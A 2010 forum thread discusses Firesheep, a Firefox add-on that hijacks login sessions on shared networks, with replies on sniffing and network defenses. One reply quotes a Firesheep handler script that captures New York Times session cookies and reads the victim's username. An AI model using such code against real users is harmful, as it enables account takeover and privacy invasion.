« previous next »
Pages: [1]

Author Topic: Firefox Add-On Hijacks Wireless Sessions  (Read 1215 times)

Ben

  • Administrator
  • Senior Member
  • *****
  • Posts: 46,453
  • I'm an Extremist!
Firefox Add-On Hijacks Wireless Sessions
« on: October 26, 2010, 10:38:01 AM »
I'll be interested to see industry reaction to this. Of course it's always been possible, but with the Add-On it appears any idiot with a computer can do it.

Firesheep
Report to moderator   Logged
"I'm a foolish old man that has been drawn into a wild goose chase by a harpy in trousers and a nincompoop."

AmbulanceDriver

  • Junior Rocketeer
  • friends
  • Senior Member
  • ***
  • Posts: 5,949
Re: Firefox Add-On Hijacks Wireless Sessions
« Reply #1 on: October 26, 2010, 12:40:40 PM »
Hrm....  That's *very* interesting...
Report to moderator   Logged
Are you a cook, or a RIFLEMAN?  Find out at Appleseed!

http://www.appleseedinfo.org

"For some many people, attempting to process a logical line of thought brings up the blue screen of death." -Blakenzy

AZRedhawk44

  • friends
  • Senior Member
  • ***
  • Posts: 13,991
Re: Firefox Add-On Hijacks Wireless Sessions
« Reply #2 on: October 26, 2010, 12:53:10 PM »
Layer 2 wireless sniffing.

This is why switches are better than hubs.  Unless a NIC is in "promiscuous" mode and on the same switch fabric (a VLAN or group of switches behind the same default gateway), you can't sniff packets when you aren't along the intended route (one of the two dozen routers between you and your destination).

When your network access is an omnidirectional radio, you can't "switch" the traffic and hide it.  By default, all NICs on a wireless system are promiscuous.

Hardwire.  And put your wireless access point on a separate subnet (or even NAT-ed, and NAT your hardwire network too).  That way, if you're at home on a perfectly good hardwired connection and someone hacks your WPA/WEP/whatever access point, they can't put their wireless NIC into promiscuous mode and sniff packets on your hardwire LAN.  They'd have to hijack your top level router/switch to sniff packets.
Report to moderator   Logged
"But whether the Constitution really be one thing, or another, this much is certain - that it has either authorized such a government as we have had, or has been powerless to prevent it. In either case, it is unfit to exist."
--Lysander Spooner

I reject your authoritah!

Ben

  • Administrator
  • Senior Member
  • *****
  • Posts: 46,453
  • I'm an Extremist!
Re: Firefox Add-On Hijacks Wireless Sessions
« Reply #3 on: October 26, 2010, 01:12:04 PM »
I generally don't use public Wi-Fi to begin with. I use a 3G modem and Kaspersky security suite, and even then though I may check my Amazon account or something, I'm pretty paranoid about stuff like online banking and prefer to be behind my home firewall when accessing that. I won't use the online banking app on my phone either.
Report to moderator   Logged
"I'm a foolish old man that has been drawn into a wild goose chase by a harpy in trousers and a nincompoop."

Harold Tuttle

  • Professor Chromedome
  • friend
  • Senior Member
  • ***
  • Posts: 8,069
Re: Firefox Add-On Hijacks Wireless Sessions
« Reply #4 on: October 26, 2010, 02:45:15 PM »
Firesheep can also poll the traffic on your wired network

it is scriptable for grabbing cookies from a wide swath of the web :


// Authors:
//   Ian Gallagher <crash@neg9.org>
register({
  name: 'New York Times',
  url: 'http://www.nytimes.com/',
  domains: [ 'nytimes.com' ],
  sessionCookieNames: [ 'NYT-S', 'nyt-d' ],

  processPacket: function () {
    var nyt_d = this.firstPacket.cookies['nyt-d'];
    this.sessionId = nyt_d;
  },

  identifyUser: function() {
    var resp = this.httpGet(this.siteUrl);
    this.userName = resp.body.querySelectorAll("#memberTools a")[1].innerHTML;
  }
});
Report to moderator   Logged
"The true mad scientist does not make public appearances! He does not wear the "Hello, my name is.." badge!
He strikes from below like a viper or on high like a penny dropped from the tallest building around!
He only has one purpose--Do bad things to good people! Mit science! What good is science if no one gets hurt?!"
Pages: [1]
« previous next »